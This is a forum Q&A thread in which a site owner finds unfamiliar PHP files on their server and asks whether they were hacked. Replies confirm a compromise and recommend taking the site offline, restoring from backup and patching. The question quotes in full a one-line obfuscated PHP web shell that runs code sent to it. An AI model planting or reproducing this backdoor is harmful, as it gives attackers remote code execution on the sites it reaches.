# PHP Code found on index that I did not do

Tags: php, html, malware

so I noticed a drop in my SEO search results off google and then I went to go change my meta keywords in my index.html page.

I noticed that my index.html was changed to index1.html and then duplicated to index.php

this code was added to the very top of that php code
https://pastebin.com/yVUP3dHZ

This file was also added to my files hagdfi.php and 
https://pastebin.com/p776yxdV

so was this one border.php

```
<?php $c=base64_decode('YXNzZXI=').$_GET[n].'t';@$c($_POST[x]);?>abcabcabc
```

What happened? was I being hacked?

Comment: Yup, sounds like you got hacked...  Looks like they tried SQL injection to get access to your DB.

Comment: That's a nice simple script that will execute any arbitrary PHP code posted to it. Yes, you've been hacked.

Comment: How do I fix this so it doesn't happen again?

Comment: Well, at the very least, you're going to want to take the site offline. Restore from the most recent backup you have, and install any relevant security patches to stop it happening again. Ultimately you're probably not going to be able to find out what (if any) code has actually been executed, so your only sensible option is to assume the worst.

Answer (score 0):

It's safe to assume that if you didn't put it there, and you are in control of that page, then it should not be there.

I would replace the index page with a backup and then see if you can find out through your provider how to keep it from happening again.

Trust nothing, verify everything!

Answer (score 0):

you have been hacked. the code in the file has been encoded. I don't mastering this encoding but it's more using in c programming. you can use this for analysing the file : https://malwaredecoder.com/